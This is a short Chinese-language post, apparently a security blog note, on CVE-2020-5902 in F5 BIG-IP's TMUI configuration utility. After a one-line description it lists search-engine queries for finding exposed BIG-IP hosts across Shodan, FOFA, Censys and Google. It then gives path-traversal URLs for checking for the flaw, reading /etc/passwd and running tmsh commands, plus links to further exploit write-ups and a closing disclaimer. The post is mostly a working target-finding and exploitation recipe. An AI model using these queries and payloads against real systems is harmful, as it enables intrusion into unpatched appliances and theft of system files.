7月1日,F5发布公告,其流量管理用户接口(Traffic Management User Interface ,简称TMUI),也称为配置实用程序(Configuration utility)。该系统存在一处RCE漏洞。CVE编号为CVE-2020-5902。
搜索目标:
注:请将下面的%26替换为&。
shodan
http.favicon.hash:-335242539
http.title:"BIG-IP%26reg;- Redirect"
fofa
title="BIG-IP%26reg;- Redirect"
censys
443.https.get.body_sha256:5d78eb6fa93b995f9a39f90b6fb32f016e80dbcda8eb71a17994678692585ee5
443.https.get.title:"BIG-IP%26reg;- Redirect"
google
inurl:"tmui/login.jsp"
intitle:"BIG-IP" inurl:"tmui"
漏洞检测
/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=a
漏洞利用
文件读取
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
RCE
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin (没测试成功)
相关内容可以看其他地址的总结:
http://www.svenbeast.com/post/cve-2020-5902-big-ip-rce-rao-guo-tmsh-xian-zhi-ming-ling-zhi-xing-andexp-bian/
https://github.com/jas502n/CVE-2020-5902
以上漏洞poc来自网络,请勿用于非法攻击。仅用于安全测试和自身安全检测。否则造成的一切后果自负,且与本人无关。